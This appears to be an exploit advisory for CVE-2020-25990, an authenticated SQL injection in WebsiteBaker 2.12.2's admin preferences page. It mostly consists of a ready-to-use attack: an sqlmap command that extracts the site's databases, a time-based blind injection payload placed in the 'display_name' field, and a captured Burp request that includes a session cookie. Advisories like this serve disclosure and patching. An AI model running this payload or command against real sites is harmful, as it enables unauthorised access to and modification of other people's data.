WebsiteBaker 2.12.2 SQL Injection

WebsiteBaker version 2.12.2 suffers from an authenticated remote SQL injection vulnerability.

MD5 | 4f52a219a3daa8ad4fe1365adb54ff13

# Exploit Title: WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)
# Google Dork: -
# Date: 2020-09-20
# Exploit Author: Roel van Beurden
# Vendor Homepage:
# Software Link:
# Version: 2.12.2
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-25990

1. Description:
WebsiteBaker 2.12.2 allows SQL Injection via parameter 'display_name' in /websitebaker/admin/preferences/save.php.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
In Burpsuite intercept the request from /websitebaker/admin/preferences/save.php and save it like burp.req
Then run SQLmap to extract the data from the database:

sqlmap -r burp.req --risk=3 --level=5 --dbs --random-agent

3. Example payload:
display_name=Administrator" AND (SELECT 9637 FROM (SELECT(SLEEP(5)))ExGN)-- Cspz&language=EN&timezone=system_default&date_format=M d Y&time_format=g:i A&[email protected]&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw

4. Burpsuite request:
POST /websitebaker/admin/preferences/save.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Connection: close
Cookie: wb-8123-sid=otfjsmqu8vljs9737crkcm8nec
Upgrade-Insecure-Requests: 1


Related Posts